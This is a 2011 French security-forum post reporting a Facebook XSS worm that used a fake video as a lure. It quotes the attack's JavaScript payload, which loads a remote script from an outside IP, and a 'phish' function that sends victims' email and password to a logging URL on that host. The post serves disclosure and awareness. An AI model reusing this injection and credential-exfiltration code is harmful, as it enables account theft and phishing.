Vulnérabilité Facebook: Spam & Hameçonage, Facebook,Javascript,XSS,eBaum's World,Video,Spam,Phish,Stealer |
Bienvenue invité ( Connexion | Inscription )
![]() ![]() |
Vulnérabilité Facebook: Spam & Hameçonage, Facebook,Javascript,XSS,eBaum's World,Video,Spam,Phish,Stealer |
Apr 7 2011, 11:05 PM
Message
#1
|
|
![]() Accro à ZATAZ ![]() ![]() ![]() ![]() Groupe : Modérateur ZATAZ Messages : 431 Inscrit : 12-January 08 Lieu : Darknet Membre no 4,034 |
Il y a quelques jours, un ver informatique s'est propagé en exploitant une vulnérabilité de type XSS sur facebook.
Aujourd'hui, une nouvelle vulnérabilité a été exploitée pour lire automatiquement une vidéo à l'aide d'un lecteur personnalisé hébergé sur eBaum's World avec une surprise à la clé. La charge utile malveillante utilisée sur ce XSS est particulièrement soignée ; bien loin de l'habituelle et gentille méthode alert() Citation <a href=" javascript:if(window.opener){ window.opener.document.body.appendChild(document.createElement('script')).src='http://173.231.144.82/fb.js?like_link=http://www.pinkweddingfavors.info/bullypal/&app_link=http://apps.facebook.com/palpushesbully/&embed_link=http://www.ebaumsworld.com/playerbeta.swf?id0=81417366&im_text=haha! hilarous'; window.close(); }else{ document.body.appendChild(document.createElement('script')).src='http://173.231.144.82/fb.js?like_link=http://www.pinkweddingfavors.info/bullypal/&app_link=http://apps.facebook.com/palpushesbully/&embed_link=http://www.ebaumsworld.com/playerbeta.swf?id0=81417366&im_text=haha! hilarous'; }" target="_blank"><img src="http://i.imgur.com/8hZd5.png" border="0" /></a> source: http://apps.facebook.com/palpushesbully/http://edge.ebaumsworld.com/crossdomain.xml Code <?xml version="1.0"?> http://edge.ebaumsworld.com/mediaFiles/video/1564429/81417366.mp4<cross-domain-policy> <allow-access-from domain="*.www.media.ebaumsworld.com" /> <allow-access-from domain="*media.ebaumsworld.com" /> </cross-domain-policy> La vidéo n'était qu'un leurre,... Citation function phish(email, pass){ Pour plus d'infos techniques, consulter: http://pastebin.com/73xfQ2wjvar log = new Image(); log.src = 'http://173.231.144.82/log.php?email=' + email + '&pass=' + pass; } nb: 173.231.144.82 est une machine VoxCLOUD de chez Voxel. -------------------- Come crawling faster,
Obey your Master, Your fife burns faster, Obey your Master, Master Master of puppets I'm pulling your strings, Twisting your mind and smashing your dreams, Blinding by me you can's see a thing, Just call my name cause i'll hear you scream Master, Master.. До скорой встречи - Пока! |
|
|
|
![]() ![]() |
|
Version bas débit | Nous sommes le : 21st May 2013 - 02:04 AM |